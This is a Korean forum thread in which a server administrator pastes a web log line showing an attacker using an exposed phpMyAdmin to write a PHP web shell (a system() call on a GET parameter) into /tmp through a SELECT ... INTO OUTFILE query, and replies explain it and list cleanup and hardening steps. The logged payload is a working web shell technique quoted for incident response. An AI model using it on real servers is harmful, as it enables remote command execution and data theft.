112.219.92.82 - - [24/Mar/2012:01:01:42 +0900] "GET /phpmyadmin/main.php?reload=1&sql_query=select+%27%3C%3Fphp+echo+%5C%27%3Cpre%3E%5C%27%3Bsystem%28%24_GET%5B%5C%27cmd%5C%27%5D%29%3B+echo+%5C%27%3C%2Fpre%3E%5C%27%3B+%3F%3E%27+INTO+OUTFILE+%27%2Ftmp%2F.a%27&token=6447c5d6e0ef4ea9a5807a9cdf775021 HTTP/1.1" 200 7428 "도메인/util/phpmyadmin/server_sql.php?token=6447c5d6e0ef4ea9a5807a9cdf775021" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.26) Gecko/20120128 Firefox/3.6.26"
위와같이 웹로그가 다수 발견되었는데요
phpmyadmin 소스 파일을 웹에서 다운받을수 있게 리스트 보이게 해둿엇는데 그경로 뒤에 이런식으로 쿼리를 남겼네요.. 굵게 표시해놓은 .a 파일이 /tmp 디렉토리에서 발견되었구요..
인젝션이나 그런형태 인건가요?
아이피 변조해서 무수히 많은 로그가 생성되었습니다 ㅠㅠ
zh-CN이건 중국이라는거같기도 하고 ㅠㅠ 조언바랍니다 ㅠㅠ 일단 그경로의 파일은 삭제햇습니다 ㅠㅠ
댓글 3개
13년 전
음....정확한건 들어가서 봐야겠지만......phpmyadmin 기본 로그가 저런식으로 남다보니...
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
xkingcode
13년 전
웹셀 업로드 맞네요. PHP로 보내는 명령을 바로 실행하는 PHP 파일을 만든겁니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
13년 전
phpmyadmin 최신 버전으로 사용하는게 좋겠네요.
phpmyadmin 트래픽 공격도 발생하더군요.
phpmyadmin 트래픽 공격도 발생하더군요.
게시판 목록
프로그램
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 8130 | 9년 전 | 486 | ||
| 8129 |
 Angelos |
9년 전 | 635 | |
| 8128 | 9년 전 | 509 | ||
| 8127 |
Angelos |
9년 전 | 572 | |
| 8126 | 9년 전 | 495 | ||
| 8125 | 9년 전 | 757 | ||
| 8124 |
Angelos |
9년 전 | 499 | |
| 8123 | 9년 전 | 487 | ||
| 8122 | 9년 전 | 421 | ||
| 8121 | 9년 전 | 523 | ||
| 8120 | 9년 전 | 452 | ||
| 8119 | 9년 전 | 538 | ||
| 8118 |
Angelos |
9년 전 | 621 | |
| 8117 |
 뜨거운형제들 |
9년 전 | 392 | |
| 8116 |
PASKRAN
|
9년 전 | 461 | |
| 8115 | 9년 전 | 450 | ||
| 8114 |
kiplayer
|
9년 전 | 592 | |
| 8113 | 9년 전 | 431 | ||
| 8112 |
Angelos |
9년 전 | 548 | |
| 8111 | 9년 전 | 401 | ||
| 8110 | 9년 전 | 435 | ||
| 8109 | 9년 전 | 350 | ||
| 8108 |
Angelos |
9년 전 | 530 | |
| 8107 |
Angelos |
9년 전 | 426 | |
| 8106 |
Angelos |
9년 전 | 419 | |
| 8105 | 9년 전 | 467 | ||
| 8104 |
Angelos |
9년 전 | 422 | |
| 8103 |
Angelos |
9년 전 | 419 | |
| 8102 |
Angelos |
9년 전 | 381 | |
| 8101 |
snshero
|
9년 전 | 767 | |
| 8100 | 9년 전 | 825 | ||
| 8099 | 9년 전 | 792 | ||
| 8098 | 9년 전 | 702 | ||
| 8097 | 9년 전 | 496 | ||
| 8096 | 9년 전 | 695 | ||
| 8095 | 9년 전 | 826 | ||
| 8094 | 9년 전 | 496 | ||
| 8093 | 9년 전 | 784 | ||
| 8092 | 9년 전 | 746 | ||
| 8091 | 9년 전 | 1135 | ||
| 8090 | 9년 전 | 756 | ||
| 8089 | 9년 전 | 956 | ||
| 8088 | 9년 전 | 627 | ||
| 8087 | 9년 전 | 740 | ||
| 8086 | 9년 전 | 506 | ||
| 8085 | 9년 전 | 475 | ||
| 8084 | 9년 전 | 604 | ||
| 8083 | 9년 전 | 577 | ||
| 8082 | 9년 전 | 745 | ||
| 8081 | 9년 전 | 458 | ||
| 8080 | 9년 전 | 556 | ||
| 8079 | 9년 전 | 504 | ||
| 8078 | 9년 전 | 430 | ||
| 8077 | 9년 전 | 512 | ||
| 8076 | 9년 전 | 396 | ||
| 8075 | 9년 전 | 417 | ||
| 8074 | 9년 전 | 375 | ||
| 8073 | 9년 전 | 431 | ||
| 8072 | 9년 전 | 424 | ||
| 8071 |
o1o111
|
9년 전 | 876 | |
| 8070 | 9년 전 | 386 | ||
| 8069 | 9년 전 | 319 | ||
| 8068 | 9년 전 | 576 | ||
| 8067 | 9년 전 | 382 | ||
| 8066 | 9년 전 | 414 | ||
| 8065 | 9년 전 | 364 | ||
| 8064 | 9년 전 | 346 | ||
| 8063 | 9년 전 | 319 | ||
| 8062 | 9년 전 | 295 | ||
| 8061 | 9년 전 | 341 | ||
| 8060 | 9년 전 | 369 | ||
| 8059 | 9년 전 | 304 | ||
| 8058 | 9년 전 | 236 | ||
| 8057 | 9년 전 | 374 | ||
| 8056 | 9년 전 | 293 | ||
| 8055 | 9년 전 | 336 | ||
| 8054 | 9년 전 | 347 | ||
| 8053 | 9년 전 | 395 | ||
| 8052 | 9년 전 | 279 | ||
| 8051 | 9년 전 | 318 | ||
| 8050 | 9년 전 | 383 | ||
| 8049 | 9년 전 | 310 | ||
| 8048 | 9년 전 | 423 | ||
| 8047 | 9년 전 | 344 | ||
| 8046 | 9년 전 | 280 | ||
| 8045 | 9년 전 | 244 | ||
| 8044 | 9년 전 | 330 | ||
| 8043 | 9년 전 | 267 | ||
| 8042 | 9년 전 | 279 | ||
| 8041 | 9년 전 | 326 | ||
| 8040 | 9년 전 | 253 | ||
| 8039 | 9년 전 | 305 | ||
| 8038 | 9년 전 | 259 | ||
| 8037 | 9년 전 | 386 | ||
| 8036 | 9년 전 | 461 | ||
| 8035 | 9년 전 | 415 | ||
| 8034 | 9년 전 | 379 | ||
| 8033 | 9년 전 | 338 | ||
| 8032 | 9년 전 | 406 | ||
| 8031 | 9년 전 | 331 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기